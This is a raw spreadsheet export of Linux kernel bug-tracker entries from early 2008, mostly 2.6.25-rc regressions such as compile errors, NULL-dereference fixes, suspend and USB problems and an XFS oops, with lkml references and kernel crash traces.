snd_seq_device nfsd lockd sunrpc exportfs coretemp w83627ehf hwmon_vid hwmon usbhid hid sg sd_mod snd_hda_intel snd_pcm yenta_socket rsrc_nonstatic pcmcia_core snd_timer snd uhci_hcd ehci_hcd snd_page_alloc usbcore processor ata_piix e1000 libata rtc Pid: 369, comm: rescan-scsi-bus Not tainted (2.6.24 #1) EIP: 0060:[&lt;f919300c&gt;] EFLAGS: 00210202 CPU: 0 EIP is at sbp2_scsi_slave_alloc+0xc/0x20 [firewire_sbp2] EAX: 00000000 EBX: eaca4400 ECX: 00000001 EDX: eaca4400 ESI: eaca4800 EDI: eaca4814 EBP: f7fa0000 ESP: f57ccd34 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process rescan-scsi-bus (pid: 369, ti=f57cc000 task=c487ca90 task.ti=f57cc000) Stack: c027538a 00000000 c026d7ea 00000000 f7fa0000 00000000 f7fa0170 eaca4800 c0275650 c02f231d 00000000 00000001 c02592d7 00000000 00000000 c03c0be0 00200246 22222222 22222222 22222222 00000000 c04efd0c 00000000 00000000 Call Trace: [&lt;c027538a&gt;] scsi_alloc_sdev+0x18a/0x200 [&lt;c026d7ea&gt;] scsi_device_lookup_by_target+0x6a/0x80 [&lt;c0275650&gt;] scsi_probe_and_add_lun+0xf0/0xb90 [&lt;c02f231d&gt;] mutex_lock_nested+0x15d/0x2c0 [&lt;c02592d7&gt;] attribute_container_device_trigger+0x17/0xc0 [&lt;c02f3795&gt;] _spin_lock_irqsave+0x45/0x60 [&lt;c01ece7f&gt;] kobject_get+0xf/0x20 [&lt;c0253710&gt;] get_device+0x10/0x20 [&lt;c027646d&gt;] scsi_alloc_target+0x23d/0x350 [&lt;c02766af&gt;] __scsi_scan_target+0x8f/0x6c0 [&lt;c02f3a15&gt;] _spin_unlock+0x25/0x40 [&lt;c0188f63&gt;] mntput_no_expire+0x13/0x60 [&lt;c017c635&gt;] link_path_walk+0x65/0xc0 [&lt;c02f231d&gt;] mutex_lock_nested+0x15d/0x2c0 [&lt;c0276dd6&gt;] scsi_scan_host_selected+0x56/0x160 [&lt;c0276e61&gt;] scsi_scan_host_selected+0xe1/0x160 [&lt;c0278157&gt;] store_scan+0xe7/0xf0 [&lt;c015750f&gt;] __alloc_pages+0x4f/0x380 [&lt;c02f231d&gt;] mutex_lock_nested+0x15d/0x2c0 [&lt;c0278070&gt;] store_scan+0x0/0xf0 [&lt;c0257606&gt;] class_device_attr_store+0x26/0x40 [&lt;c01b1516&gt;] sysfs_write_file+0xa6/0x110 [&lt;c0173206&gt;] vfs_write+0xa6/0x140 [&lt;c01b1470&gt;] sysfs_write_file+0x0/0x110 [&lt;c01738d1&gt;] sys_write+0x41/0x70 [&lt;c0104406&gt;] sysenter_past_esp+0x5f/0x91 ======================= Code: &lt;8b&gt; 00 f6 40 28 02 74 04 c6 42 77 24 31 c0 c3 90 8d 74 26 00 83 ec EIP: [&lt;f919300c&gt;] sbp2_scsi_slave_alloc+0xc/0x20 [firewire_sbp2] SS:ESP 0068:f57ccd34 ---[ end trace 087d2b81b476ab71 ]---</t>
  </si>
  <si>
    <t>interactivity problems in -git4+</t>
  </si>
  <si>
    <t>2008-02-17 11:51 UTC</t>
  </si>
  <si>
    <t>10022 10163</t>
  </si>
  <si>
    <t>Subject : 2.6.24-git4+ regression Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-01-30 14:56 References : http://lkml.org/lkml/2008/1/30/254 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Handled-By : Srivatsa Vaddagiri &lt;vatsa@linux.vnet.ibm.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline</t>
  </si>
  <si>
    <t>tbench regression in 2.6.25-rc1</t>
  </si>
  <si>
    <t>2008-02-17 11:56 UTC</t>
  </si>
  <si>
    <t>2008-03-16 08:48 UTC</t>
  </si>
  <si>
    <t>Subject : tbench regression in 2.6.25-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-02-15 02:52 References : http://lkml.org/lkml/2008/2/14/546 Handled-By : Eric Dumazet &lt;dada1@cosmosbay.com&gt; Handled-By : David Miller &lt;davem@davemloft.net&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] Linux 2.6.25-rc2 - Kernel Ooops while running dbench</t>
  </si>
  <si>
    <t>2008-02-17 12:07 UTC</t>
  </si>
  <si>
    <t>2008-03-04 00:23 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] Linux 2.6.25-rc2 - Kernel Ooops while running dbench Submitter : Kamalesh Babulal &lt;kamalesh@linux.vnet.ibm.com&gt; Date : 2008-02-16 06:44 References : http://lkml.org/lkml/2008/2/16/4 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>cobalt_btns.c &lt;-&gt; struct platform_device compile error</t>
  </si>
  <si>
    <t>2008-02-17 12:12 UTC</t>
  </si>
  <si>
    <t>2008-03-18 09:16 UTC</t>
  </si>
  <si>
    <t>Subject : cobalt_btns.c &lt;-&gt; struct platform_device compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/293 Caused-By : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; commit b037b08e59633d939d79f1df9c43c6625f8db904</t>
  </si>
  <si>
    <t>cdev removal broke cobalt_btns.c compilation</t>
  </si>
  <si>
    <t>2008-02-17 12:14 UTC</t>
  </si>
  <si>
    <t>Subject : cdev removal broke cobalt_btns.c compilation Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/295 Caused-By : Dmitry Torokhov &lt;dtor@mail.ru&gt; commit 0c1efd365306c9b04df5abdd41e9b4dc721e84fb</t>
  </si>
  <si>
    <t>CRYPTO_NULL must select CRYPTO_BLKCIPHER</t>
  </si>
  <si>
    <t>2008-02-17 12:17 UTC</t>
  </si>
  <si>
    <t>2008-02-20 00:18 UTC</t>
  </si>
  <si>
    <t>Subject : CRYPTO_NULL must select CRYPTO_BLKCIPHER Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/296 Caused-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt; commit 3631c650c495d61b1dabf32eb26b46873636e918 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/17/296</t>
  </si>
  <si>
    <t>mips/bcm47xx/setup.c compile error</t>
  </si>
  <si>
    <t>2008-02-17 12:19 UTC</t>
  </si>
  <si>
    <t>2008-02-19 17:43 UTC</t>
  </si>
  <si>
    <t>Subject : mips/bcm47xx/setup.c compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/297 Caused-By : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; commit d3c319f9c8d9ee2c042c60b8a1bbd909dcc42782</t>
  </si>
  <si>
    <t>mips SMBUS_PSC_BASE compile errors</t>
  </si>
  <si>
    <t>2008-02-17 12:21 UTC</t>
  </si>
  <si>
    <t>2008-03-03 00:26 UTC</t>
  </si>
  <si>
    <t>Subject : mips SMBUS_PSC_BASE compile errors Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/299 Caused-By : Manuel Lauss &lt;mano@roarinelk.homelinux.net&gt; commit 8b798c4d16b762d15f4055597ff8d87f73b35552</t>
  </si>
  <si>
    <t>Linux 2.6.25-rc2 regression: LVM cannot find volume group</t>
  </si>
  <si>
    <t>2008-02-17 12:22 UTC</t>
  </si>
  <si>
    <t>2008-03-05 14:54 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.25-rc2 regression: LVM cannot find volume group Submitter : Tilman Schmidt &lt;tilman@imap.cc&gt; Date : 2008-02-16 20:14 References : http://lkml.org/lkml/2008/2/16/208 Handled-By : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; Handled-By : Jiri Slaby &lt;jirislaby@gmail.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc2 vdso_install breaks user "make install"</t>
  </si>
  <si>
    <t>2008-02-17 12:38 UTC</t>
  </si>
  <si>
    <t>2008-02-24 16:32 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc2 vdso_install breaks user "make install" Submitter : Rene Herman &lt;rene.herman@keyaccess.nl&gt; Date : 2008-02-16 04:31 References : http://lkml.org/lkml/2008/2/15/555 Handled-By : Sam Ravnborg &lt;sam@ravnborg.org&gt; Patch : http://lkml.org/lkml/2008/2/16/73 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc2 regression in rt61pci wireless driver</t>
  </si>
  <si>
    <t>2008-02-17 12:43 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:34 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc2 regression in rt61pci wireless driver Submitter : "Chris Clayton" &lt;chris2553@googlemail.com&gt; Date : 2008-02-16 13:06 References : http://lkml.org/lkml/2008/2/16/82 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Current git very broken on the Dreamcast</t>
  </si>
  <si>
    <t>2.6.25-rc2-10953-g52065cd</t>
  </si>
  <si>
    <t>2008-02-17 12:53 UTC</t>
  </si>
  <si>
    <t>2008-03-14 00:24 UTC</t>
  </si>
  <si>
    <t>Subject : Current git very broken on the Dreamcast Submitter : Adrian McMenamin &lt;adrian@newgolddream.dyndns.info&gt; Date : 2008-02-16 19:38 References : http://lkml.org/lkml/2008/2/16/196 Handled-By : Kristoffer Ericson &lt;kristoffer.ericson@gmail.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>2.6.25-rc1/2 CD/DVD burning broken</t>
  </si>
  <si>
    <t>2008-02-17 12:57 UTC</t>
  </si>
  <si>
    <t>2008-03-02 17:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc1/2 CD/DVD burning broken Submitter : Andreas Schwab &lt;schwab@suse.de&gt; Date : 2008-02-16 21:52 References : http://lkml.org/lkml/2008/2/16/262 Handled-By : Jeff Garzik &lt;jeff@garzik.org&gt; Handled-By : Mark Lord &lt;lkml@rtr.ca&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc[12] Video4Linux Bttv Regression</t>
  </si>
  <si>
    <t>2008-02-17 13:02 UTC</t>
  </si>
  <si>
    <t>2008-04-02 14:55 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc[12] Video4Linux Bttv Regression Submitter : Bongani Hlope &lt;bonganilinux@mweb.co.za&gt; Date : 2008-02-17 09:36 References : http://lkml.org/lkml/2008/2/17/55 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.25-rc2] System freezes ca. 1 minute after logging into KDE</t>
  </si>
  <si>
    <t>2008-02-17 13:11 UTC</t>
  </si>
  <si>
    <t>2008-02-19 15:04 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.25-rc2] System freezes ca. 1 minute after logging into KDE Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-02-17 11:39 References : http://lkml.org/lkml/2008/2/17/78 Caused by: commit 69cc64d8d92bf852f933e90c888dfff083bd4fc9 Author: David S. Miller &lt;davem@davemloft.net&gt; [NDISC]: Fix race in generic address resolution This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Suspend doesn't work when SD card is inserted</t>
  </si>
  <si>
    <t>2008-02-17 13:14 UTC</t>
  </si>
  <si>
    <t>2008-03-05 14:59 UTC</t>
  </si>
  <si>
    <t>Subject : Suspend doesn't work when SD card is inserted Submitter : "Zdenek Kabelac" &lt;zdenek.kabelac@gmail.com&gt; Date : 2008-02-17 12:00 References : http://lkml.org/lkml/2008/2/17/81 Handled-By : Rafael J. Wysocki &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.25-rc2] e100: Trying to free already-free IRQ 11 during suspend ...</t>
  </si>
  <si>
    <t>2008-02-17 13:19 UTC</t>
  </si>
  <si>
    <t>2008-03-13 16:47 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.25-rc2] e100: Trying to free already-free IRQ 11 during suspend ... Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Date : 2008-02-16 13:36 References : http://lkml.org/lkml/2008/2/17/125 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mips: fix SNI_RM EISA=n compilation</t>
  </si>
  <si>
    <t>2008-02-17 14:02 UTC</t>
  </si>
  <si>
    <t>2008-02-19 17:41 UTC</t>
  </si>
  <si>
    <t>Subject : mips: fix SNI_RM EISA=n compilation Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/346 Caused-By : Thomas Bogendoerfer &lt;tsbogend@alpha.franken.de&gt; commit 231a35d37293ab88d325a9cb94e5474c156282c0 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/17/346</t>
  </si>
  <si>
    <t>mips yosemite_defconfig compile error</t>
  </si>
  <si>
    <t>2008-02-17 16:45 UTC</t>
  </si>
  <si>
    <t>2008-03-14 00:59 UTC</t>
  </si>
  <si>
    <t>Subject : mips yosemite_defconfig compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/17/383 Caused-By : Christoph Lameter &lt;clameter@sgi.com&gt; commit 9e2779fa281cfda13ac060753d674bbcaa23367e</t>
  </si>
  <si>
    <t>Alexey Kuznetsov</t>
  </si>
  <si>
    <t>timerfd_*() system calls not enabled for MIPS</t>
  </si>
  <si>
    <t>2008-02-18 12:44 UTC</t>
  </si>
  <si>
    <t>Dmitri Vorobiev</t>
  </si>
  <si>
    <t>2008-02-19 11:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: n/a Earliest failing kernel version: n/a Distribution: this bug is not distribution-dependent Hardware Environment: Malta 4Kc Software Environment: 2.6.25-rc2 Problem Description: While building the kernel for MIPS, the following messages are displayed: &lt;stdin&gt;:1377:2: warning: #warning syscall timerfd_create not implemented &lt;stdin&gt;:1389:2: warning: #warning syscall timerfd_settime not implemented &lt;stdin&gt;:1393:2: warning: #warning syscall timerfd_gettime not implemented</t>
  </si>
  <si>
    <t>[bug] uml doesn't boot under 2.6.25-rc1 host (was Re: 2.6.24-mm1 bugs)</t>
  </si>
  <si>
    <t>2008-02-18 14:24 UTC</t>
  </si>
  <si>
    <t>2008-02-24 16:51 UTC</t>
  </si>
  <si>
    <t>Subject : [bug] uml doesn't boot under 2.6.25-rc1 host (was Re: 2.6.24-mm1 bugs) Submitter : Miklos Szeredi &lt;miklos@szeredi.hu&gt; Date : 2008-02-18 22:03 References : http://lkml.org/lkml/2008/2/18/454 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Unreal actual_brightness and other strange behavior of video module on FSC Amilo Pi 2515</t>
  </si>
  <si>
    <t>2008-02-19 09:14 UTC</t>
  </si>
  <si>
    <t>Erik Boritsch</t>
  </si>
  <si>
    <t>2008-06-13 22:11 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo Hardware Environment:Fujitsu-Siemens Amilo Pi 2515 Problem Description:When video module is loaded, /sys/class/backlight/acpi_video0/ entries are created. Dmesg output is ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no) The values, however, are strange. actual_brightness is always a big integer like e.g. 2102324320 (changes every time module is loaded, remains unchanged afterwards regardless of brightness level). Initial value of acpi_video0/brightness is 0 (although the display is at maximum brightness). max_brightness is set to 100. I am able to change the brightness if I echo 25,50 or 75. Any other value makes my display return to maximum brightness. Actually, the display is supposed to have brightness levels from 1 to 7, AFAIK. If I load with ACPI_DEBUG, initial value of brightness is also a great number such as 2099887552. Steps to reproduce:always</t>
  </si>
  <si>
    <t>dm-raid1.c: fix NULL dereferences</t>
  </si>
  <si>
    <t>2.6.25-rc2-git</t>
  </si>
  <si>
    <t>2008-02-19 11:33 UTC</t>
  </si>
  <si>
    <t>2008-02-19 17:36 UTC</t>
  </si>
  <si>
    <t>Subject : dm-raid1.c: fix NULL dereferences Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/19/361 Caused-By : Jonathan Brassow &lt;jbrassow@redhat.com&gt; commit 06386bbfd2441416875d0403d405c56822f6ebac Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/19/361</t>
  </si>
  <si>
    <t>ipv4/fib_hash.c: fix NULL dereference</t>
  </si>
  <si>
    <t>2008-02-19 15:14 UTC</t>
  </si>
  <si>
    <t>2008-02-24 23:55 UTC</t>
  </si>
  <si>
    <t>Subject : ipv4/fib_hash.c: fix NULL dereference Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/19/485 Caused-By : Eric Dumazet &lt;dada1@cosmosbay.com&gt; commit a6501e080c318f8d4467679d17807f42b3a33cd5 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/19/485</t>
  </si>
  <si>
    <t>net/9p/trans_virtio.c: kmalloc() enough memory</t>
  </si>
  <si>
    <t>2008-02-19 16:19 UTC</t>
  </si>
  <si>
    <t>2008-02-24 23:56 UTC</t>
  </si>
  <si>
    <t>Subject : net/9p/trans_virtio.c: kmalloc() enough memory Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/19/542 Caused-By : Eric Van Hensbergen &lt;ericvh@gmail.com&gt; commit e2735b7720320b68590ca2b32b78ca91213931b2 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/19/542</t>
  </si>
  <si>
    <t>message/fusion/mptbase.c: fix use-after-free's</t>
  </si>
  <si>
    <t>2008-02-19 16:44 UTC</t>
  </si>
  <si>
    <t>2008-02-24 23:57 UTC</t>
  </si>
  <si>
    <t>Subject : message/fusion/mptbase.c: fix use-after-free's Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/19/562 Caused-By : Sathya Prakash &lt;sathya.prakash@lsi.com&gt; commit e78d5b8f1e73ab82f3fd041d05824cfee7d83a2c Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/19/562</t>
  </si>
  <si>
    <t>Spurious messages at boot, eventually hangs the usb subsustem</t>
  </si>
  <si>
    <t>2.6.25-rc2-git[34]</t>
  </si>
  <si>
    <t>2008-02-20 09:10 UTC</t>
  </si>
  <si>
    <t>2008-03-25 05:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc2-git1 Earliest failing kernel version: 2.6.25-rc2-git4 Distribution: Debian Hardware Environment: ASUS A8V Deluxe, Athmon 64 x2 4200+ Software Environment: Problem Description: At boot, I've spurious messages related to the USB subsystem. Then related to scsi (emulated) devices. usb 1-7: device descriptor read/64, error -110 usb 1-7: device descriptor read/64, error -110 usb 1-7: reset high speed USB device using ehci_hcd and address 5 usb 1-7: device descriptor read/64, error -110 usb 1-7: device descriptor read/64, error -110 usb 1-7: reset high speed USB device using ehci_hcd and address 5 usb 1-7: device descriptor read/8, error -110 usb 1-7: device descriptor read/8, error -110 usb 1-7: reset high speed USB device using ehci_hcd and address 5 usb 1-7: device descriptor read/8, error -110 usb 1-7: device descriptor read/8, error -110 usb 1-7: USB disconnect, address 5 ... sd 3:0:0:0: Device offlined - not ready after error recovery scsi 3:0:0:1: rejecting I/O to dead device scsi 3:0:0:1: rejecting I/O to dead device scsi 3:0:0:1: rejecting I/O to dead device ... I will join dmesg output for clarity. The sde to sdg are a built-in flash card reader connected in USB. After the boot process complete, I've lost the usb card reader. After a reboot, the motherboad fails in POST displaying: Initializing USB Controllers I have to power cycle the machine to resume to normal operation. I've not this problem with 2.6.24 for the stable branch, neither with any rc1 I built. Both 2.6.25-rc2-git3 and 2.6.25-rc2-git4 have it.</t>
  </si>
  <si>
    <t>keyboard not working after hibernate/resume</t>
  </si>
  <si>
    <t>2008-02-20 10:38 UTC</t>
  </si>
  <si>
    <t>LÉVAI Dániel</t>
  </si>
  <si>
    <t>2008-11-22 10:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.24 (not accurate, because I didn't try with an earlier version) Distribution: "vanilla" 2.6.25-rc2 kernel from kernel.org Hardware Environment: Acer TravelMate 7520g, Turion64 X2 TL60, SATA harddisks, Synaptics touchpad. Please request any other information if necessary. Software Environment: Debian Linux with packages from unstable. Problem Description: After the system has been hibernated and resumed, the laptop's keyboard is not working, and I am getting this error message through the console: atkbd.c: Spurious ACK on isa0060/serio0. Some program might be trying access hardware directly. An attached USB keyboard is working after the resume, only the "embedded" keyboard is affected. And I think I should mention that everything else (eg. the touchpad) is working fine after the resume (except the pc-speaker, but I think that that will go to another report). Steps to reproduce: # echo disk &gt; /sys/power/state Load the same kernel image with "resume=&lt;swap&gt;". # atkbd.c: Spurious ACK on isa0060/serio0. Some program might be trying access hardware directly. ... and the laptop's keyboard is not working, I need to reboot with the attached USB keyboard.</t>
  </si>
  <si>
    <t>GDT SCSI</t>
  </si>
  <si>
    <t>scsi_drivers-gdt-scsi</t>
  </si>
  <si>
    <t>Hang in md5_resync</t>
  </si>
  <si>
    <t>2008-02-21 13:13 UTC</t>
  </si>
  <si>
    <t>2008-03-16 09:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 Earliest failing kernel version: 2.6.25-rc2 Distribution: Debian unstable Hardware Environment: sata_nv, ext3, Seagate SATA disks Software Environment: N/A Problem Description: After upgrading to 2.6.25, I did some light I/O (basically a tab-complete in my home directory), and the whole machine promptly hung. After a while, the serial console spat out: [ 548.684064] BUG: soft lockup - CPU#1 stuck for] [ 548.684065] CPU 1: [ 548.684065] Modules linked in: tun eeprom ide_generic ide_disk ide_cd_mod cdx [ 548.684065] Pid: 3599, comm: md4_resync Not tainted 2.6.25-rc2 #1 [ 548.684065] RIP: 0010:[&lt;ffffffff802fee07&gt;] [&lt;ffffffff802fee07&gt;] __write_loc0 [ 548.684065] RSP: 0018:ffff81011fcffc18 EFLAGS: 00000287 [ 548.684065] RAX: ffff81011c14dfd8 RBX: ffff8100d42d30c0 RCX: ffff8100d42d30c0 [ 548.684065] RDX: 0000000000000000 RSI: ffff8100d4cd0d90 RDI: ffff8100d4cd0d00 [ 548.684065] RBP: ffff81011fcffb90 R08: 00000000fe538a93 R09: 0000000000000000 [ 548.684065] R10: 00000000000000c0 R11: ffffffff803ad3e1 R12: ffffffff8020bcb6 [ 548.684065] R13: ffff81011fcffb90 R14: ffff8100d4cd0d00 R15: 0000000000000000 [ 548.684065] FS: 00007f8748e0c6e0(0000) GS:ffff81011fcb5dc0(0000) knlGS:00000 [ 548.684065] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [ 548.684066] CR2: 00007f8748e076f3 CR3: 00000000d296b000 CR4: 00000000000006e0 [ 548.684066] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 548.684066] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 548.684066] [ 548.684066] Call Trace: [ 548.684066] &lt;IRQ&gt; [&lt;ffffffff80446fe4&gt;] ? _write_lock_bh+0x1a/0x1c [ 548.684066] [&lt;ffffffff803ad49e&gt;] ? neigh_resolve_output+0xbd/0x281 [ 548.684066] [&lt;ffffffff80407ab5&gt;] ? ip6_output+0xc5c/0xc71 [ 548.684066] [&lt;ffffffff8039d414&gt;] ? sock_alloc_send_skb+0x93/0x1e1 [ 548.684066] [&lt;ffffffff8041685b&gt;] ? __ndisc_send+0x3c6/0x4fb [ 548.684066] [&lt;ffffffff880a431a&gt;] ? :sd_mod:sd_prep_fn+0x74/0x6fb [ 548.684066] [&lt;ffffffff8041725b&gt;] ? ndisc_send_ns+0x71/0x7e [ 548.684066] [&lt;ffffffff80363c3c&gt;] ? scsi_request_fn+0x339/0x3a5 [ 548.684066] [&lt;ffffffff804181df&gt;] ? ndisc_solicit+0x159/0x166 [ 548.684066] [&lt;ffffffff80235673&gt;] ? __mod_timer+0xb0/0xbf [ 548.684066] [&lt;ffffffff803adc72&gt;] ? neigh_timer_handler+0x292/0x2d0 [ 548.684066] [&lt;ffffffff803ad9e0&gt;] ? neigh_timer_handler+0x0/0x2d0 [ 548.684066] [&lt;ffffffff8023521b&gt;] ? run_timer_softirq+0x151/0x1bf [ 548.684066] [&lt;ffffffff80231f40&gt;] ? __do_softirq+0x65/0xcf [ 548.684066] [&lt;ffffffff8020c20c&gt;] ? call_softirq+0x1c/0x28 [ 548.684066] [&lt;ffffffff8020d8b4&gt;] ? do_softirq+0x2c/0x68 [ 548.684066] [&lt;ffffffff8021919d&gt;] ? smp_apic_timer_interrupt+0x8a/0xa5 [ 548.684066] [&lt;ffffffff8020bcb6&gt;] ? apic_timer_interrupt+0x66/0x70 [ 548.684066] &lt;EOI&gt; [&lt;ffffffff880d549c&gt;] ? :raid456:raid5_compute_sector+0x19 [ 548.684066] [&lt;ffffffff880d5511&gt;] ? :raid456:stripe_to_pdidx+0x48/0x51 [ 548.684066] [&lt;ffffffff880db728&gt;] ? :raid456:sync_request+0x7d3/0x8a1 [ 548.684066] [&lt;ffffffff802edf17&gt;] ? generic_unplug_device+0x18/0x24 [ 548.684066] [&lt;ffffffff802ecdef&gt;] ? blk_unplug+0x5a/0x60 [ 548.684066] [&lt;ffffffff880d51af&gt;] ? :raid456:unplug_slaves+0x55/0x91 [ 548.684066] [&lt;ffffffff880b0884&gt;] ? :md_mod:md_do_sync+0x54e/0x96c [ 548.684066] [&lt;ffffffff802429a7&gt;] ? getnstimeofday+0x2f/0x83 [ 548.684066] [&lt;ffffffff802263e0&gt;] ? try_to_wake_up+0xfd/0x10e [ 548.684066] [&lt;ffffffff880b2ff6&gt;] ? :md_mod:md_thread+0xde/0xfa [ 548.684066] [&lt;ffffffff880b2f18&gt;] ? :md_mod:md_thread+0x0/0xfa [ 548.684066] [&lt;ffffffff8023e741&gt;] ? kthread+0x47/0x76 [ 548.684066] [&lt;ffffffff80228ebd&gt;] ? schedule_tail+0x28/0x5c [ 548.684066] [&lt;ffffffff8020be98&gt;] ? child_rip+0xa/0x12 [ 548.684066] [&lt;ffffffff8023e6fa&gt;] ? kthread+0x0/0x76 [ 548.684066] [&lt;ffffffff8020be8e&gt;] ? child_rip+0x0/0x12 [ 548.684066] and the machine continued hanging. Downgraded to 2.6.23 again, seems to work fine. Will try 2.6.24.2 shortly.</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel paging request: 2.6.24 xfs_file_readdir</t>
  </si>
  <si>
    <t>2008-02-22 06:15 UTC</t>
  </si>
  <si>
    <t>2008-06-01 18:56 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.1 Earliest failing kernel version: 2.6.24.2 Distribution: Hardware Environment: validated for i386 (2x p3 &amp; 2x p4) Software Environment: gcc (GCC) 4.1.2 (Gentoo 4.1.2 p1.0.1) Problem Description: G'day we've caught this bug on two of an our hosts with a gap of three days just after migration to 2.6.24.2 (a last one got stack on i/o a one hour ago). One of them (p3) is a pretty i/o loaded mail exchanger but the second one has negligible i/o most of the time. (and last one oopses at first). I don't know just now how it can be force-reproduced with any sane timeslice (so i can't see how i.g. bisect could be useful here :( ). I'll play with the old 2x piii on weekend, something like dbench xxx on cicle or so, but i suspect it can be not so i/o related. [574124.902070] BUG: unable to handle kernel paging request at virtual address f8000008 [574124.902079] printing eip: c01d7154 *pde = 00000000 [574124.902087] Oops: 0000 [#1] SMP [574124.905481] Modules linked in: ipt_REJECT xt_state xt_multiport iptable_filter [574124.912940] [574124.914537] Pid: 29766, comm: rm Not tainted (2.6.24.2 #1) [574124.920127] EIP: 0060:[&lt;c01d7154&gt;] EFLAGS: 00010286 CPU: 1 [574124.925731] EIP is at xfs_file_readdir+0xea/0x199 [574124.930538] EAX: 00000000 EBX: 00000550 ECX: 00000020 EDX: 00000000 [574124.936917] ESI: 00000000 EDI: f8000000 EBP: d26f1f68 ESP: d26f1f10 [574124.943294] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [574124.948804] Process rm (pid: 29766, ti=d26f1000 task=d3f41a40 task.ti=d26f1000) [574124.956046] Stack: 00000550 00000000 01811a81 00000000 00000000 c015eb80 d26f1f94 dc5386c0 [574124.964728] cd61f780 00000000 00000000 00000000 00000550 00000000 f7fff000 00001000 [574124.973409] 00001000 00000552 00000000 c02ff920 dc5386c0 f289e600 d26f1f88 c015ed6b [574124.982090] Call Trace: [574124.984846] [&lt;c01035de&gt;] show_trace_log_lvl+0x1a/0x2f [574124.990125] [&lt;c0103690&gt;] show_stack_log_lvl+0x9d/0xa5 [574124.995401] [&lt;c0103746&gt;] show_registers+0xae/0x17d [574125.000418] [&lt;c010392b&gt;] die+0x116/0x1e3 